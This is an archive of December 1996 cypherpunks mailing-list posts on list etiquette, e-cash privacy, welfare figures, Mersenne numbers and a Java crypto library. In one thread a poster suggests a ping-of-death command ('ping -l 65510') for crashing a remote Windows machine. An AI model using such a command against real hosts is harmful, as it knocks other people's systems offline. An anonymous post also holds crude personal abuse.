In-Reply-To: <573c49$ren@tor-nn1-hb0.netcom.ca>
Message-ID: <32A335E3.734A@LSD.com>
MIME-Version: 1.0
Content-Type: text/plain


"PrOduct Cypher,"

I need to get in touch with you to discuss your PGP library work.
Please email me ASAP (my key's on the MIT keyserver). Thanks.

   dave

PS: Pls excuse the x-post.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Mon, 2 Dec 1996 03:22:46 -0800 (PST)
To: Asgaard <asgaard@Cor.sos.sll.se>
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <Pine.HPP.3.91.961129170630.7957A-100000@cor.sos.sll.se>
Message-ID: <199612021122.MAA02666@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> > Rule 2:  Don't forward articles from other forums to
> > cypherpunks.  We can find it ourselves the same place you did
> 
> This is not universally true. Everyone doesn't have access to
> a functional News server or even to the Web, and some interesting
> stuff could come from closed commercial sites etc.


Yeah, my "rules" are mainly to intimidate newbies into holding
still long enough to be properly socialized.  Only the
Meta-Rule is inviolate.


Regards,

Bryce, who once receifved a Perry-gram for forwarding an
article to cpunks which, unbeknownst to him, had already been
so forwarded by others




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMqK7+kjbHy8sKZitAQEf5AL9EOuni5KdQ8Ug6SY+a0DmiRruoD0ruSam
cs35j2So279AT07u0A3fqDeBqUehJfCupyXKU5GekV1IO5M/qpPrxL02/LvSROqS
Y3XcVQjD3ZFDOGfLYZysWo2YTaUFMyGF
=+E96
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 2 Dec 1996 09:40:33 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: denial of service and government rights
In-Reply-To: <32A2F0D1.7A5A@gte.net>
Message-ID: <Pine.SUN.3.94.961202123721.1459B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Dec 1996, Dale Thorn wrote:

> [snippo]
> 
> > What you're talking about is contempt of congress.  This is not "fraud."
> > "I had no idea what I was talking about, but as luck would have it I was
> > right anyhow." Here, have a bozo button.
> 
> I was right, and you just can't stand it, can you?  I think the shoe fits
> you, Mr. Clown, so wear it in "good health".

Actually, you were not right.  Your claim was that this somehow
constituted a conspiracy.  I was merely pointing out that even if your
version of events was correct (which I hardly conceed), you still had no
clue what you were talking about when you began and just happened to
"fall" into the answer when your legs were knocked out from under you.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Mon, 2 Dec 1996 03:48:08 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <329E4432.4D93@gte.net>
Message-ID: <199612021148.MAA04719@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Hi Dale.  I believe I've seen you around.  Thanks for replying
to my article.


>  Bryce wrote:
> > I.  Etiquette -- The House Rules At The Virtual Cypherpunks Party
> > The Meta-Rule:  It's John Gilmore's virtual house.  He is the
> > sole owner of the computer (toad.com) that hosts cypherpunks
> > and the sole authority over what the users of that computer
> > (you) can do with it.
> 
> [mo' snip]
> 
> Ordinarily, I'd leave this post alone, but I really hate it when people
> twist ideas for their own philosophical purposes.  To whit: "John is the
> sole authority over what the users of his computer can do with his
> computer" (quote approximate).


Can you "to wit" one or two more times, here?  I'm not sure
what idea is being twisted into what other idea and which
philosophical purpose this twisting serves.  But I'm curious.


> I don't *do* anything with *his* computer. I send email into the ether
> with an address on it, and he picks it up at his discretion and does
> what he wants with it.  I am in no way involved in that process, and I
> do not share *any* responsibility for how he handles the email. 


Hm.  So if you send an email into the ether with 
"Cc: cypherpunks@toad.com" and "Subject: MAKE MONEY REALLY
TRULY FAST!", then you share no responsibility for the fact
that a copy of that email is going to arrive in the inboxes of
thousands of subscribers?


Okay, it could be an interesting discussion, but what's your
point?  


My point was (and is) that neither you nor I have any kind of
_right_ to access the services of toad.com against John's
will.  Seems like a very simple point (deceptively simple, one
might say...), but I recall several people, including Dale
Thorn, opining that Dmitri Vulis _did_ have the right to access
those services with or without John's consent.


What gives?


Regards,

Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMqLB80jbHy8sKZitAQHf9QL+LBEJ3Fc+l2KjfDFSNP9iYac0k07Bb20e
mEzpNyvfJxJkH1sTc9D/jkr59JGSm888Akp24FchrQQNA2YcUkon0XlY3p/pyJYm
oDhnQyg0cR+u9nAbeWrIbV5Krz1eeqqw
=fa24
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Mon, 2 Dec 1996 03:50:13 -0800 (PST)
To: cypherpunks@toad.com
Subject: New payment scheme for Web access
Message-ID: <Pine.HPP.3.91.961202125243.16863B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


(See abstract from Edupage at the end)

Who wants to use the MTV web site anyway, but I suppose this could
spread. I guess a very popular site could allow access only to domains
(....foo.bar) that have paid instead of blocking those who have not,
otherwise 'new' sites could circumvent it easily. On the other hand,
a proxy server inside of an allowed domain would circumvent the allowing
kind of scheme, at least for a while (until they found out about it).
Great opportunities for hacking wars.

Another payment scheme in use is to recieve passwords for closed
Web pages by voice phoning to an expensive number. Did the porno sites
invent this (they have long been in related business)?

Asgaard

**************************************************************************
MTV TURNS THE TABLES IN WEB VIEWING
Viacom's MTV Networks has come up with a new way to make its Web investment
pay off -- it's putting the squeeze on online service providers, demanding
that they pay multimillion dollar fees or risk having their subscribers
blocked from viewing MTV's Web site. <...>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Mon, 2 Dec 1996 04:01:44 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <329F9BA0.541B@gte.net>
Message-ID: <199612021201.NAA05961@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 A million monkeys operating under the pseudonym "Dale Thorn
 <dthorn@gte.net>" typed:
>
> Bryce (I think) said words to the effect that "We (subscribers) are doing
> something with John's computer, etc.", as though the list subscribers are
> actually operating John's computer, with John's kind permission and over-
> view


Yes, this is fairly accurate.  Of course we (most of us) do not
have full Turing machine access to John's computer or to its
peripherals, but we do have access to a few simple functions
which we use with gusto, including broadcasting, subscribing
and unsubscribing, and the other functions of majordomo.


Perhaps you are objecting to the idea that our access to John's
computer is equivalent to, say, our access to our own
computers?  I certainly agree with you that it is not the same
kind of access.


> What I said was:  I don't *do* anything with John's computer, I merely
> mail messages with an address on them, and John can remail or dispose of
> those messages as he wishes, as long as he doesn't modify them or otherwise
> use them for any purpose besides what they were intended for.


Yeah, there are some (relatively) subtle issues here like "when
is it merely extended causal relation and when is it usage", or 
"what are the details of this implicit agreement that we have
with John" or whatnot, but I'm not sure that those are the
issues that you are talking about.  To wit:


> Bryce's (I think) writing was clearly an example of the kind of double-
> speak that 1984-ish censors use to justify their actions, and I for one
> cannot let that kind of B.S. go unchallenged.


What?  What sly newspeak did I use and more importantly what
great truth am I attempting to conceal?


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMqLFH0jbHy8sKZitAQGJuQL+O3nz30rJqJp2rGajj+yeZAFTlu4hISTU
/GbSxJLXrBCHGA0SQhVnMpImre3RhJEx1IrwFV+ZeWiubVYtR24s1CEzxDUu5fMb
3XcQUHeUJmG4JpjyFsvpN1Mh6WKKy2Al
=Lp9K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pgut001@cs.auckland.ac.nz
Date: Sun, 1 Dec 1996 16:53:57 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Strong-crypto smart cards in Singapore and Germany
Message-ID: <84948800022098@cs26.cs.auckland.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


whgiii@amaranth.com ("William H. Geiger III") writes:

><sigh> Big Brother comming to a bank near you.
>
>Does anyone understand the implications of a society moving to an
>electroinc cash based system??
>
>All trasactions will be recorded, moitored, tracked & analysed. This is
>not just the government that one has to worry about but corporations also.

Actually the German system contains some fairly elaborate safeguards to make
it pretty challenging to automatically track transactions (Germans have 
historical reasons for being uneasy about government monitoring).  However
given other German laws like the Fernmeldeanlagenueberwachungsverordnung
(yes, that's one word), which make the CALEA look like a picnic, I'm not sure
how long these safeguards will remain in place.  Given that the standard has
been created by a collaboration of all German banks, who are big enough to 
tell the government to take a hike if they demand access to the data, it may
be safe (certainly the people involved in the project that I've spoken to are
confident that they can keep the data private, however I'm not so sure how
it'll work out in the long run).

As for the Singapore solution, the Singpore government knows whats best for
you, so it isn't any of your business to question their judgement.  Anyone
thinking otherwise gets 25 strokes of the rattan.

Peter.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Mon, 2 Dec 1996 15:07:38 -0800 (PST)
To: unde0275@frank.mtsu.edu (Internaut)
Subject: Re: IP address
In-Reply-To: <01BBE040.DE540E40@s19-pm03.tnstate.campus.mci.net>
Message-ID: <199612022029.OAA00440@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Internaut wrote:
> 
> 
> 
> > Adamsc wrote:
> > > Igor wrote
> > > > On Sun, 1 Dec 1996 22:23:30 -0600, Internaut wrote:
> > > >What is the risk of publishing your dynamic IP address to a web =
> page=20
> > > >while you are on line?  How vulnerable is someone just connected to =
> > > >the internet, w/o any server running? What attacks are feasable? =
> -->=20
> >> Well, if you are running Win95 (all) or 3.1 (w/certain TCP/IP stacks) =
> your
> >> machine can be locked up or rebooted at *any* time using just PING!
> >Isn't is Unix that is actually vulnerable?
> I tried pinging myself off and it didn't work; maby it has to be from a =
> remote host.
> =09
> 
> 

try ping -l 65510 host.name.edu

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Mon, 2 Dec 1996 15:09:12 -0800 (PST)
To: Stephen Boursy <boursy@earthlink.net>
Subject: Re: wealth and property rights
Message-ID: <v02140b01aec910089b2a@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Adam Back wrote:
>>
>> Steve Boursy writes:
>>
>>>   That's a fair question.  I don't begrude one's ownership of their
>>> fair share--but I do have serious problems with what we shall
>>> call 'accumulators' if you will.  For them I have contempt and no--
>>> they do not have that right of possession and often such 'work' is
>>> at the expense and on the backs of others.
>>
>> I'm an accululator :-)
>>
>> The investments I have I worked for.
>
>  Well of course you have--but the majority of people
>in the world that are poor have worked just as hard
>and do not derive the same benefits--that needs to
>be changed.
>
>  <clip>
>
>> See, if you spend your money now, on the above, you have no right to
>> criticize me when I look relatively wealthy later.  It's your choice
>> to blow your money.
>
>
>  I agree--that's not what I was talking about--the majority of wealth
>is handed down not earned--and the ability to earn also more often
>than not results in hand me down priv.

I believe it was Thomas Jefferson who was successful at getting the
practice of  primo geniture outlawed in Virginia (it was later adopted by
all the other states).  He believed in a 'meritocracy' or sorts and abhored
any practice which would create a merchant or political aristocracy in the
new Republic.  Unfortunately much of his wisdom was ignored (e.g. objection
to a central bank, and the forbidding of one generation to indebt another)
and we suffer the consequences to this day.

>
>
>> Btw, people of your mentality (communists/socialists) already make it
>> very difficult for me to accumulate,
>
>  We do our best--some day we'll take it all away--really.
>
>                             Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Repellin <Thomas.Repellin@gni.fr>
Date: Mon, 2 Dec 1996 06:09:37 -0800 (PST)
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <32A2E313.41C6@gni.fr>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe cypherpunks




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Mon, 2 Dec 1996 14:50:43 -0800 (PST)
To: cypherpunks@toad.com
Subject: [ANNOUNCEMENT] Sphere packings
Message-ID: <199612022250.PAA04546@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain


Tim C. May's police record is many times longer 
than his prick (well, that's not hard).

             \|/
             @ @
        -oOO-(_)-OOo- Tim C. May





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Mon, 2 Dec 1996 13:06:34 -0800 (PST)
To: List Cyberia <cypherpunks@toad.com>
Subject: No Subject
Message-ID: <Pine.SUN.3.95.961202160253.1502N-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[Cross-posted to cyberia & cypherpunks]

Links, albeit rather thin ones, to background info on the Technical
Advisory Committee to Develop a Federal Information Processing Standard
for the Federal Key Management Infrastructure appear at: 

http://csrc.nist.gov/tacdfipsfkmi/

The first (public) meeting will be Dec. 5-6 at the Sheraton Grand Hotel at
Dallas/Ft. Worth Airport [Highway 114 & Esters Boulevard], 4440 W. John
Carpenter Freeway, Irving, Texas. 

Alas, I won't be able to make it.  On-the-spot reports most welcome...
The committee is also asking for written submissions (35 copies!!).

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Weissman, Gregg" <gweissman@spyrus.com>
Date: Mon, 2 Dec 1996 17:03:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Programming Errors
Message-ID: <9611028495.AA849573786@spysouth.spyrus.com>
MIME-Version: 1.0
Content-Type: text/plain



     
     
     
______________________________ Forward Header __________________________________
Subject: Programming Errors
Author:  Alan Arndt <aga@intertrust.com> at internet 
Date:    11/19/96 1:50 PM
     
     
>From New Scientist, 28 August 93, Feedback column:
     
"The National Westminster Bank admitted last month that it keeps personal 
information about its customers, such as their political affiliation on 
computer. But now Computer Weekly reveals that a financial institution, 
sadly unnamed, has gone one better and moved into the realm of personal 
abuse. The institution decided to mailshot 2000 of its richest customers, 
inviting them to buy extra services. One of its computer programmers wrote 
a program to search through its databases and select its customers 
automatically. He tested the program with an imaginary customer called Rich 
Bastard.  Unfortunately, an error resulted in all 2000 letters being 
addressed "Dear Rich Bastard". The luckless programmer was subsequently 
sacked."
     
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce <bryce@digicash.com>
Date: Mon, 2 Dec 1996 07:44:17 -0800 (PST)
To: Dale Thorn <dthorn@gte.net>
Subject: Re: [NOISE]-- [PHILOSOPHYPUNKS] Re: The House Rules At The Permanent Virtual Cypherpunks Party
In-Reply-To: <32A2F39C.5996@gte.net>
Message-ID: <199612021544.QAA12207@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

> Now I've gotcha!  If I, Dale Thorn, an ordinary person (not a commercial
> mailer), realize somehow what your snail mail address is (an analogy),
> and I send you a personal letter, are you saying I don't have the "right"
> to do so?  Even if I am aware that you redistribute the letter, as, say,
> a newspaper such as the L.A. Times would?


Yes this is a fine analogy.  You have the right to send
whatever letters you want; you don't have the right to demand
that any particular thing be _done_ with those letters once
they arrive, in the absence of some contract to the contrary.


> I'm guessing that what you're saying is something to do with the content
> or size of such a mailing, yes?


Noooo...  What I was saying was that even such a simple service
as a mailing list raises some complex issues about agency and
responsibility.  Did _you_ send MMF to all those people, or did
Gilmore?  What if Gilmore had a MMF filter in place?  What if
you evaded it?  What if Gilmore only broadcasts signed messages
and you signed the MMF?  What if you paid to have it broadcast?


So what _I'm_ saying is that there are some complex issues
about this kind of cyberspatial event, but that the realspace
substrate is relatively simple-- it's Gilmore's computer and
you have no moral authority to demand that he do or not do any
particular thing with it.


In the following, you appear to take exception to both of these
claims, or at least to the first one-- I'm not sure.


> But whatever the case, I'm not "doing something with" your mailbox if
> I send you a snail mail letter, and I'm not "doing something with" your
> computer if I send you a posting. It's you who know the result of opening
> up your computer to the phone lines, and it's up to you to post *your*
> "rules", and to date, I don't recall any postings from John Gilmore to
> me or the list regarding such rules, just a few little tin-plated
> dictators doing it in his name.


I'm still not sure if you are just prone to colorful rhetoric,
or if I have really upset you with something I've said.  If the
latter, I still don't understand what, exactly.


Bryce




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMqL5UEjbHy8sKZitAQEukQMAjS4etLT4pRzoQGrQrNr77m8NwEs4+VYC
coIbBNqnVtllRg5eofMUaJvX8zZQKicnwF7ZiT1SxnAlHygOMcnFztI8oJS3HNG5
lpo86+8rtiLjx4jPC4zntGxCrPkECCS3
=UPBq
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: help@pathfinder.com
Date: Mon, 2 Dec 1996 14:03:24 -0800 (PST)
To: cypherpunks@toad.com
Subject: Pathfinder Personal Edition Launches
Message-ID: <199612022203.RAA05964@tigger.dev.pathfinder.com.pathfinder.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Friend of Pathfinder:

We invite you to discover Pathfinder Personal Edition, the new personalized
news and information service available exclusively on Pathfinder.

With Pathfinder Personal Edition, you can customize the news to make it
YOUR news.  You just specify your areas of interest, and with the click of
a mouse, Pathfinder Personal Edition searches the most comprehensive
collection of up-to-the-minute news sources available online (including
over 20 specialized news wires and some of your favorite magazines -- Time,
Fortune, Money, People, Sports Illustrated, Entertainment Weekly and Life)
and brings back to you news, sports scores, stock quotes, and even your
favorite cartoons.

With Pathfinder Personal Edition you're not just getting raw information
from news feeds, you're getting in-depth information that's valuable to
you, complete with analysis.  Pathfinder Personal Edition even has a staff
of real editors working every day to bring you the top stories from their
areas of expertise.  And with eight graphical formats to choose from and
control over how sections and articles appear, Pathfinder Personal Edition
literally makes the news your news.

Everything is up to you -- you can build your own newspaper from the ground
up or choose one of our six Editor's Editions from the newsstand and make
it your own by personalizing the content right down to your local weather.

Pathfinder Personal Edition puts everything in one place, so you spend less
time wading through unwanted information and more time soaking up what you
want to know.

With this special risk-free offer, you can try Pathfinder Personal Edition
for free for two full months!  Avoid information overload -- try Pathfinder
Personal Edition today: http://pathfinder.com/promo

Sincerely,
Pathfinder

Pathfinder Personal Edition - Retrieves your world.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 2 Dec 1996 17:09:23 -0800 (PST)
To: Cypherpunks <cypherpunks@toad.com>
Subject: FRIDAY THE 13TH PICTURES
Message-ID: <Pine.SUN.3.91.961202170243.24323A-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

Well, better late than never.  Photos from my last costume party
or now on the Web.  Check them out at:

		http://www.c2.net/~sandy/web.htm

(My eyebrows and most of my hair have grown back in the ensuing
two and a half months.)

Mark 15 February on your calendars.  I'll be having another gala
masquerade ball on that date.  The venue will be Pacifica, CA.
A formal invitation will be posted to the list a month or so
before the party.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <mycroft@actrix.gen.nz>
Date: Sun, 1 Dec 1996 21:11:10 -0800 (PST)
To: Scottauge@aol.com
Subject: Re: A quick discussion of Mersenne Numbers
In-Reply-To: <961201141011_806714836@emout09.mail.aol.com>
Message-ID: <199612020412.RAA00976@mycroft.actrix.gen.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 1 Dec 1996 14:10:13 -0500, Scottauge@aol.com wrote:

   A mercenne number is of the type:

   M(p) = 2**p -1 results in a prime when p is a prime.

*Occasionally* results in a prime when p is prime.  (A Mersenne number
is any number of that form, prime or composite.  It so happens that if
M(p) is prime, p is prime)

   Hopefully this will lead the way to see the pattern of prime
   numbers and being able to compute prime numbers in a far more
   efficient manner (after all a function that when given a prime
   number results in a prime number would be quite a kicker now
   wouldn't it!)

That's easy: f(x) = x

   The other Mersenne primes include:

   2,3,5,7,13,17,19,31,127,61,89, and 107.

2, 5, 13, 17, 19, 61, 89 and 107 are not Mersenne numbers :-|

The first few Mersenne primes are:
3, 7, 31, 127, 8191, 131071, 524287, 2147483647

-- 
Paul Foley <mycroft@actrix.gen.nz>       ---         PGPmail preferred

	   PGP key ID 0x1CA3386D available from keyservers
    fingerprint = 4A 76 83 D8 99 BC ED 33  C5 02 81 C9 BF 7A 91 E8
----------------------------------------------------------------------
If God had wanted you to go around nude, He would have given you bigger
hands.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: varange@crl.com (Troy Varange)
Date: Mon, 2 Dec 1996 17:54:28 -0800 (PST)
To: cypherpunks@toad.com
Subject: Phrack, where can i find it?
Message-ID: <Love@22777>
MIME-Version: 1.0
Content-Type: text/plain


Tim Scanlon <tfs@adsl-122.cais.com> writing [  762] bytes in <$m2n21503-.9612012338.AA09683@adsl-122.cais.com> from nexp.crl.com!usenet73.supernews.com!news.good.net!news.good.net!www.nntp.primenet.com!nntp.primenet.com!feed1.news.erols.com!phase2.worldnet.att.net!uunet!in1.uu.net!204.171.44.51!scramble.lm.com!mail2news!toad.com!cypherpunks-errors said:

> > where can i find latest (and old) phrack issues?
> > 
> ftp.fc.net /pub/phrack has all the back issues, as well as the
> current ones. 

	Mid-1995 is about their latest issue.  Their older issues
	truely sucked with mucho false info.

-- 
Cheers!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: apache <apache@quux.apana.org.au>
Date: Mon, 2 Dec 1996 15:23:35 -0800 (PST)
To: haystack@holy.cow.net
Subject: Re: COREL TO CENSOR ALL CLIP ART WORLDWIDE
In-Reply-To: <199612011623.IAA11650@abraham.cs.berkeley.edu>
Message-ID: <Pine.LNX.3.91.961202175731.19215C-100000@quux.apana.org.au>
MIME-Version: 1.0
Content-Type: text/plain



The worlds gone fuckin mad.


On Sun, 1 Dec 1996, John Anonymous MacDonald wrote:

> Swastikas halt Corel sales 
> By Reuters
> November 25, 1996, 12 p.m. PT 
> 
> 	MUNICH, Germany--Corel (COSFF) software company
> 	has temporarily halted sales of its top-selling Corel Draw
{..}
> 	Consideration is also being given to the removal of other images
> 	from the collection, either due to legal restrictions in
> 	various countries, or due to complaints from organisations
> 	such as the Simon Wiesenthal Center.  Images considered for
> 	removal include a burning US flag, Josef Stalin, the Star of
> 	David icon, a cannabis leaf, and a drawing of a woman in a
> 	bathing costume.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Greg Shanton" <Greg_Shanton@csg.stercomm.com>
Date: Mon, 2 Dec 1996 16:17:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: unsunscribe
Message-ID: <9611028495.AA849579446@csg.stercomm.com>
MIME-Version: 1.0
Content-Type: text/plain


     unsuscribe cypherpunks





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Mon, 2 Dec 1996 18:15:45 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Programming Errors--NOT
In-Reply-To: <9611028495.AA849573786@spysouth.spyrus.com>
Message-ID: <v03007800aec93d9f62ac@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 PM -0800 12/2/96, Weissman, Gregg wrote:

>______________________________ Forward Header
>__________________________________
>Subject: Programming Errors
>Author:  Alan Arndt <aga@intertrust.com> at internet
>Date:    11/19/96 1:50 PM
>
>>From New Scientist, 28 August 93, Feedback column:
>
>"The National Westminster Bank admitted last month that it keeps personal
>information about its customers, such as their political affiliation on
>computer. But now Computer Weekly reveals that a financial institution,
>sadly unnamed, has gone one better and moved into the realm of personal
>abuse. The institution decided to mailshot 2000 of its richest customers,
...

Cypherpunks understand that protection of one's personal data is best done
by protecting it oneself, not by advocating or relying on laws to limit the
use of data acquired by others.

I mention this because I've noticed many forwardings of messages relating
to the abstract notion of "privacy," with the subtext--at least as I
perceive things--that there "ought to be a law." I'm not saying either Alan
Arndt or Gregg Weissman feel there ought to be laws banning what the bank
did, but this is certainly something I have heard misguided suscribers (and
subscribers) of this list advocating. In the name of privacy, let's pass
some more laws!

It's hardly surprising in an era of massive data bases and ready
availability of much public information--including political affiliations,
if so volunteered by voter-units--that some banks are expanding their data
bases in the manner described. Get used to it, or don't reveal as much.

--Tim May

Just say "No" to "Big Brother Inside"
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1398269     | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Ubois <jubois@netcom.com>
Date: Tue, 3 Dec 1996 11:47:36 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Culling the proles with crypto anarchy
Message-ID: <2.2.32.19961203024102.008bd390@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The numbers quoted in the press were based on a study by the Cato Institute,
"The Work Welfare Trade-Off: An Analysis of the Total Level of Welfare
Benefits by the State" by Michael Tanner, Stephen Moore, and David Hartman,
September, 1995.  It's at 
<http://www.cato.org/research/pr-nd-st.html>.  

Extracts: 

* To match the value of welfare benefits, a mother with two children would
have to earn as much as $36,400 in Hawaii or as little as $11,500 in
Mississippi.

* In New York, Massachusetts, Connecticut, the District of Columbia,
Hawaii, Alaska, and Rhode Island, welfare pays more than a $12.00-an-hour
job--or more than two and a half times the minimum wage. 

* In 40 states welfare pays more than an $8.00-an-hour job. In 17 states
the welfare package is more generous than a $10.00-an-hour job.

* Welfare benefits are especially generous in large cities. Welfare
provides the equivalent of an hourly pretax wage of $14.75 in New York
City, $12.45 in Philadelphia, $11.35 in Baltimore, and $10.90 in Detroit.
            
* In 9 states welfare pays more than the average first-year salary for a
teacher. In 29 states it pays more than the average starting salary for a
secretary. In 47 states welfare pays more than a janitor earns. Indeed, in
the 6 most generous states, benefits exceed the entry-level salary for a
computer programmer.


At 01:27 AM 12/3/96 -0800, Timothy C. May wrote:
>At 4:06 PM -0500 11/27/96, Clay Olbon II wrote:
>>At 12:46 PM 11/27/96 -0800, Dave Kinchlea <security@kinch.ark.com> wrote:
>
>>>I am not in a position to argue with you, I simply don't have the facts.
>>>My question is, do You? can you cite where this figure came from, it
>>>sounds like Republican rhetoric to me. Of course, I will point out, that
>>>minimum wage is simply not enough to feed a family. It is (or at least
>>>it should be) reserved for single folks just starting out.
>>
>>Can't give you the exact date, but it was an article in our local paper (The
>>Detroit News).  The $10 figure is not exact, as the actual number varies
>>from state to state, I remember that number as being about average.
>
>I can confirm the gist of Clay's point: I saw a table listing "effective
>hourly welfare pay" for the 50 states and D.C. This was in the "San Jose
>Mercury News," at least 8-10 months ago (and presumably elsewhere, as it
>was a major story). I used it in one of my articles, and gave the reference
>then (sorry, not handy, and my own welfare rate does not pay me enough to
>spend hours sifting through past articles for something so minor, an old
>cite, that is).
>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Mon, 2 Dec 1996 09:42:48 -0800 (PST)
To: cypherpunks@toad.com
Subject: ANNOUNCE: Latest Java Cryptix lib - includes PGP and all Java implementation
Message-ID: <199612021744.SAA06216@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


A new ALPHA release of the Systemics Cryptix crypto library for Java is
now available for download at http://www.systemics.com/software/

The library is FREE FOR COMMERCIAL AND NON-COMMERCIAL USE.

This release of the library is only intended for serious developers,
who are prepared to work with a moving API.

Differences from the previous release are that the library is now 100%
Java, although native code can still be loaded if the libraries are
present (which is unlikely, since I haven't completed them yet :-)
Also, PGP classes have now been incorportated into the library.

And of course, all the source is available (in fact, that's all that
is presently available :-)

Enjoy!

   
                 CRYPTIX 2.00 - CRYPTOGRAPHIC CLASSES FOR JAVA
                                       
   
     _________________________________________________________________
   
Description

   This library contains a suite of cryptographic classes for Java. It is
   important to note that this release is not yet stable, so is only
   recommended for use by serious developers, since there may be major
   design and API changes. For users that require stability, please use
   the previous release .
   
Features missing

   DES and Blowfish are not yet ported to Java.
   
   There is currently very little in the way of documentation and example
   programs.
   
   The auto loading of native libraries (if they are present) has not
   been tested.
   
Features

